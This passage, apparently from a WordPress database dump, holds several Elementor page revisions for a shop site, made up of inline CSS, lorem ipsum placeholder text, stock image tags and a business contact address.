.elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 14:46:50','2022-09-21 09:16:50','',1373,'https://gopalak.in/?p=1407',0,'revision','',0),(1408,1,'2022-09-21 14:46:50','2022-09-21 09:16:50','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 14:46:50','2022-09-21 09:16:50','',1373,'https://gopalak.in/?p=1408',0,'revision','',0),(1410,1,'2022-09-21 14:51:02','2022-09-21 09:21:02','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 14:51:02','2022-09-21 09:21:02','',1373,'https://gopalak.in/?p=1410',0,'revision','',0),(1411,1,'2022-09-21 14:51:02','2022-09-21 09:21:02','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 14:51:02','2022-09-21 09:21:02','',1373,'https://gopalak.in/?p=1411',0,'revision','',0),(1412,1,'2022-09-21 14:51:03','2022-09-21 09:21:03','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			